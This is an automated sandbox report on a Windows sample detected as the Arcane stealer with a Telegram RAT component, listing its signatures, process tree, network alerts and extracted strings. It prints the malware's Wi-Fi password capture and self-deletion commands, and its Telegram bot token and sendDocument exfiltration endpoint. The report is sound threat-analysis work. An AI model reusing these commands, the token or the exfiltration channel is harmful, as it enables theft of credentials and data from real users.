Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zyEDYRU0jw.exe

Overview

General Information

Sample name:zyEDYRU0jw.exe
Analysis ID:1576963
MD5:41d3660b5321768122f4c25ac9868fc3
SHA1:d42e3c5fc24e309581819cba723b14c3c247d824
SHA256:c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d
Infos:

Detection

Arcane
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Arcane Stealer
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • zyEDYRU0jw.exe (PID: 4524 cmdline: "C:\Users\user\Desktop\zyEDYRU0jw.exe" MD5: 41D3660B5321768122F4C25AC9868FC3)
    • cmd.exe (PID: 3452 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • tasklist.exe (PID: 7984 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 1400 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 2916 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • netsh.exe (PID: 5084 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 5928 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 8572 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 8632 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)
      • taskkill.exe (PID: 8680 cmdline: TaskKill /F /IM 4524 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 8740 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 8760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 3784 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
ROLLCOAST, ArcaneROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Linked Library (DLL) with no named exports. When observed by Mandiant it uniquely had only one ordinal export 0x01. This suggested the sample was designed to avoid detection and be invoked within memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.rollcoast

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendMessage"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
zyEDYRU0jw.exeJoeSecurity_ArcaneYara detected Arcane StealerJoe Security
    zyEDYRU0jw.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      zyEDYRU0jw.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ArcaneYara detected Arcane StealerJoe Security
          00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Process Memory Space: zyEDYRU0jw.exe PID: 4524JoeSecurity_ArcaneYara detected Arcane StealerJoe Security
                  Click to see the 2 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.zyEDYRU0jw.exe.d30000.0.unpackJoeSecurity_ArcaneYara detected Arcane StealerJoe Security
                    0.0.zyEDYRU0jw.exe.d30000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.0.zyEDYRU0jw.exe.d30000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security

                        Sigma Signatures

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Capture Wi-Fi password
                        Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zyEDYRU0jw.exe", ParentImage: C:\Users\user\Desktop\zyEDYRU0jw.exe, ParentProcessId: 4524, ParentProcessName: zyEDYRU0jw.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 1400, ProcessName: cmd.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T19:54:44.188399+010020390091A Network Trojan was detected149.154.167.220443192.168.11.2049757TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T19:54:43.109091+010028438561A Network Trojan was detected192.168.11.2049757149.154.167.220443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: zyEDYRU0jw.exeAvira: detected
                        Found malware configuration
                        Source: zyEDYRU0jw.exe.4524.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendMessage"}
                        Multi AV Scanner detection for submitted file
                        Source: zyEDYRU0jw.exeReversingLabs: Detection: 63%
                        Yara detected Arcane Stealer
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
                        Machine Learning detection for sample
                        Source: zyEDYRU0jw.exeJoe Sandbox ML: detected
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49757 version: TLS 1.2
                        Source: zyEDYRU0jw.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: System.Xml.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*\~ source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: Stealer.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.pdbz_ source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdata source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Malware\Desktop\Arcane\Str\Stealer\Stealer\obj\Release\Stealer.pdb source: zyEDYRU0jw.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Net.Http.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Security.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: Stealer.pdbMZ source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Configuration.pdbSystem.Core.ni.dll> source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.IO.Compression.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Configuration.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Xml.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Core.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: _prod.pdb\* source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.0000000007232000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Net.Http.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Drawing.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.pdb4 source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Core.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS] source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: INETCO~1INetCookies_prod.pdb3475e564b17091598996e6f, source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.00000000071C0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.IO.Compression.pdbH source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: mscorlib.pdbH source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER8074.tmp.dmp.17.dr
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Credentials\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\ClientSidePhishing\25\_metadata\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\Reader_21.005.20060\Jump to behavior

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49757 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.11.20:49757
                        Uses the Telegram API (likely for C&C communication)
                        Source: unknownDNS query: name: api.telegram.org
                        Source: global trafficHTTP traffic detected: POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="2c67de8b-644a-4406-b045-374572e7377e"Host: api.telegram.orgContent-Length: 120588Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                        Source: Joe Sandbox ViewIP Address: 104.16.184.241 104.16.184.241
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: icanhazip.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://mail.ru%https://rambler.ru-https://www.paypal.com#https://yandex.ru equals www.rambler.ru (Rambler)
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://mega.nz%https://roblox.com%https://cpanel.net'https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.epicgames.com;https://genshin.hoyoverse.com5https://us.shop.battle.net/https://www.booking.com/https://keep.google.com)https://www.ebay.com5https://steamcommunity.com3https://www.microsoft.com#https://yahoo.com'https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.com-https://www.icloud.com-https://www.reddit.com equals www.yahoo.com (Yahoo)
                        Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                        Source: global trafficDNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa
                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                        Source: unknownHTTP traffic detected: POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="2c67de8b-644a-4406-b045-374572e7377e"Host: api.telegram.orgContent-Length: 120588Expect: 100-continueConnection: Keep-Alive
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.00000000071C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.00000000071C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: zyEDYRU0jw.exeString found in binary or memory: http://icanhazip.com
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/0
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                        Source: tmp61E8.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://accounts.google.com/oauth/multilogin
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://api.telegram.org/bot
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000037D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocumentT
                        Source: tmp61E8.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep
                        Source: tmp61E8.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: tmp61E8.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: tmp61E8.tmp.dat.0.drString found in binary or memory: https://gemini.google.com/app?q=
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://gmail.com
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://ipinfo.io/#
                        Source: tmp61E6.tmp.dat.0.drString found in binary or memory: https://login.live.com/
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, tmp61E6.tmp.dat.0.drString found in binary or memory: https://login.live.com//
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, tmp61E6.tmp.dat.0.drString found in binary or memory: https://login.live.com/https://login.live.com/
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, tmp61E6.tmp.dat.0.drString found in binary or memory: https://login.live.com/v104
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://mega.nz%https://roblox.com%https://cpanel.net
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://ozon.ru
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.dr, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: zyEDYRU0jw.exeString found in binary or memory: https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004502000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BD00000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004520000.00000004.00000800.00020000.00000000.sdmp, tmp61EA.tmp.dat.0.dr, tmp61E9.tmp.dat.0.dr, tmp61E8.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004474000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108449628696.0000000004456000.00000004.00000800.00020000.00000000.sdmp, tmp61B6.tmp.dat.0.dr, tmp61B4.tmp.dat.0.dr, tmp61B5.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
